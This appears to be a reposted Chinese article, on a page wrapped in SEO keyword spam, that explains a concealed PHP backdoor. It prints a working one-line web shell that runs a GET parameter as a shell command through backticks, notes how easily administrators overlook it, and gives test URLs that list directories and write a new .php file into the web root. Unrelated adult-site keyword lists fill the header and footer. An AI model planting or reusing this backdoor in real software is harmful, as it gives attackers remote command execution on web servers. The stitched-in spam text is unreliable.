一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼解析

偶然間看到一段,看起來似乎沒有什么問題,確是能致命的后門代碼,這里用到了一個(gè)一般的phper都不怎么關(guān)注的反撇號(hào) ` ,反撇號(hào)包含的字符串,等同于shell_exec函數(shù)。

偽裝性很好,很容易被管理員忽略。

$selfNums = $_GET['r'];if (isset($selfNums)){  echo `$selfNums`;}

剛看到這段代碼我想大家都會(huì)說沒有問題,但是細(xì)心的朋友也會(huì)發(fā)現(xiàn)下面的變量被一個(gè)符號(hào)包起來了,既然是變量為什么要這樣了,

而且又不是單引號(hào),這個(gè)就是關(guān)鍵所在了,這個(gè)符號(hào)是 Esc 下面的一個(gè)鍵(位于感嘆號(hào)!旁邊的),

通過 echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果

如果不信的朋友可以測(cè)試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:/web/90sec.php

我用 appserv 和虛擬主機(jī)已經(jīng)測(cè)試成功。

php技術(shù)一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼解析,轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 国产成人精品久久一区二区小说 | 国产一区二区在免费观看 | 国产成人综合日韩精品婷婷九月 | 在线播放 亚洲 | 日韩在线播放一区 | 视频二区中文字幕 | 看黄网| 国产精品免费观看视频播放 | 伊人视屏 | 亚洲图片第一页 | 久久久久久久亚洲精品 | 久久99精品久久久久久久不卡 | 国产精彩视频在线 | 日韩精品中文字幕一区二区三区 | 精品一区二区香蕉 | 国产全黄三级国产全黄三级书 | 精品一区二区三区免费观看 | 激情在线播放免费视频高清 | 久久成人精品 | 巨人导航收录500精品 | 色视频免费网站 | 国产亚洲精品网站 | 免费啊v在线观看 | 国产在线观看一区二区三区 | 草草视频手机在线观看视频 | 国产成人综合久久亚洲精品 | 亚洲欧美人妖另类激情综合区 | 亚洲成a人片777777网站 | 性天堂网| 日日草草 | 99久久伊人 | 婷婷六月久久综合丁香可观看 | 91久久国产成人免费观看资源 | 日本高清在线观看视频www | 久草小区二区三区四区网页 | 视频一区亚洲 | 国产日韩91 | 国产亚洲青色国产 | 天天狠狠色综合图片区 | 国产欧美一区二区三区在线 | 五月婷婷六月丁香 |